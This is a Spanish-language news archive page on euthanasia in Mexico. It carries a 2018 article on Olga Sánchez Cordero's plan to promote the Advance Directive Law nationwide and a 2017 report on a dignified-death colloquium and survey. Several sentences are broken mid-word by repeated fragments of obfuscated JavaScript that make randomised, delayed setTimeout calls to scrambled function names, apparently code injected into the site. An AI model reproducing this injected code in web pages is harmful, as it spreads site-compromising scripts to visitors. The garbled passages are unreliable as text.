Etiquetas: Eutanasia


Buscará Sánchez Cordero promover Ley de Voluntad Anticipada en todo el país

11 julio, 2018

México. Olga Sánchez Cordero, próxima secretaria de Gobernación del virtual presidente electo Andrés Manuel López Obrador, aseguró que se promoverá en todo el país la Ley de Voluntad Anticipada, la cual busca una muerte digna para la persona que así la solicite.

“Como yo les había dicho, se promoverá en todo el territorio nacional la ley de voluntad anticipada, en todas la entidades federativas que aún no cuentan con ella. Se promoverán reformas en los códigos civiles para consagrar el derecho a una muerte digna”, comentó la exministra de SCJN a integrantes del Colegio de Notarios de la Ciudad de México, en una reunión de la semana pasada.

A su llegada a una reunión con López Obrador, Sánchez Cordero reafirmó lo dicho: “es el derecho a la muerte digna, a morir con dignidad, así como tenemos un derecho a la vida digna debemos tener consagrado el derecho a la muerte digna”.

A la fecha, solo 11 estados cuentan con esta ley: Aguascalientes, Chihuahua, Coahuila, Colima, Ciudad de México, Estado de México, Guerrero, Hidalgo, Michoacán, Nayarit y San Luis Potosí. En la capital del país entró en vigor el 7 de enero de 2008.

“La Voluntad Anticipada favorece la atención paliativa y los cuidados al final de la vida, el énfasis está en el acompañamiento del paciente durante esta etapa de su vida. No prolonga ni acorta la vida, respeta el momento natural de la muerte”, se puede leer en la página del gobierno capitalino.

Fuente: AlMomentoMx


Sobre el derecho a morir con dignidad

1 noviembre, 2017

México. Los días cercanos a la celebración del Día de Muertos una buena parte de los mexicanos habla de la muerte y la celebra; sin embargo, posterior a las fiestas son pocos los que cuentan con un plan para enfrentarla cuandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}o llegue, puntualizó la investigadora de la organización Por el Derecho a Morir con Dignidad, Asunción Álvarez.

En el marco del primer coloquio Internacional por el Derecho a una Muerte Digna, señaló que pensar en la muerte permite la toma de decisiones para poder influir en la forma de enfrentar el fin de la vida y para que éste sea de la manera en la que las personas deseen.

En ese sentido, añadió que aún con la legislación de Voluntad Anticipada hace falta proveer a las personas de una mayor información porque dicha legislación establece la libertad de dejar de recibir medicamentos o ayudas vitales en el caso de presentar etapas de enfermedad avanzadas y sin esperanza de vida.

A su vez, abundó que otra de las barreras que limitan la toma de decisiones en el momento de la muerte es que, de acuerdo con la encuesta nacional “Por el Derecho a Morir con Dignidad, México, 2016”, una buena parte de las personas encuestadas desconoce el término eutanasia, ello, aunado a una profunda influencia religiosa en este sentido, así, dijo, de lo que se trata es de ofrecer una mayor información a las personas.

Dicho estudio, refirió que 46.3 por ciento de los encuestados casi nunca piensa en la muerte y 45.3 por ciento no habla del tema con ninguna persona, sin embargo 88.5 por ciento comentó que preferiría estar acompañado por alguien en ese momento.

A su vez, la investigación arrojó que 68.3 por ciento de quienes participaron en este estudio considera que quienes enfrentan enfermedades en etapa terminal deberían tener la opción de decidir sobre la manera en la que van a morir.

Además, 68.8 por ciento consideró que los pacientes con enfermedades en fase terminal deberían contar con ayuda para morir al suspender los tratamientos que los mantienen con vida, 56.4 por ciento está de acuerdo con que los médicos ayuden al bien morir al proporcionar sustancias letales para ser suministradas por el propio enfermo y 58.3 por ciento está en favor de que los médicos apliquen de manera directa dosis letales de medicamentos.

La encuesta arrojó a su vez que 63.6 por ciento de las personas preferiría tener la posibilidad de pedir ayuda a su médico para adelantar su muerte, en tanto que 57 por ciento le gustaría que fuera el médico quien le aplicara sustancias letales en caso de presentar una enfermedad terminal y querer adelantar su muerte.

Sin embargo, 69.3 por ciento de las personas consideradas para este estudio no ha pensado en dejar por escrito el deseo de adelantar su muerte en caso de tener un padecimiento terminal; además, 80.9 por ciento no ha escuchado hablar de la Ley de Voluntad Anticipada y 71.3 por ciento opina que la ley debería ser cambiada para permitir que los enfermos terminales puedan elegir recibir ayuda para terminar con su vida si así lo deciden.

La especialista estadunidense en el tema y ponente en dicho encuentro, Frances Kissling, explicó que uno de los factores que intervienen en el desconocimiento de la eutanasia son las creencias religiosas, por lo que durante el coloquio buscará ofrecer una visión desde diferentes ángulos, al respecto puntualizó la inexistencia de cuestiones dogmáticas que tengan que ver con la eutanasia.

En tanto que la especialista de Colombia, Carmenza Ochoa, único país en Latinoamérica en donde es legal un procedimiento de eutanasia, subrayó que es necesario concientizar a las personas, a los médicos y a las familias para entender a acompañar a bien morir.

En entrevista posterior, Asunción Álvarez explicó que la voluntad anticipada es un documento en el que se expresa el deseo de las personas al momento de morir, sin embargo, existen desarticulaciones legislativas, “no hay el respaldo a los médicos para que puedan hacer lo que dice la Ley General de Salud”.

Añadió que los mexicanos somos una sociedad que niega la muerte, se trata de falta de información y poca conciencia respecto a la manera de elegir la manera de morir; sin embargo, el suicidio asistido y la eutanasia siguen estandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}o prohibidos y lo que contempla dicha legislación es el retiro de medicamentos y brindar cuidados paliativos.

Explicó que lo controversial de la eutanasia y el suicidio asistido es la necesidad de contar con ayuda para llevarlo a cabo, por lo que es necesario regular este aspecto, abundó que existen quienes ya viven en condiciones de sufrimiento y lo que podría representar una ayuda es dejar de intervenir médicamente con cuidados intensivos o soporte vital cuandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}o ya no es necesario.

La presidenta de la organización Por el Derecho a Morir con Dignidad que nació en 2007, Amparo Espinoza, expuso que con la finalidad de promover un diálogo abierto y constructivo sobre a eutanasia y la muerte médicamente asistida para considerar cambios legales para regular este aspecto.

Fuente: Notimex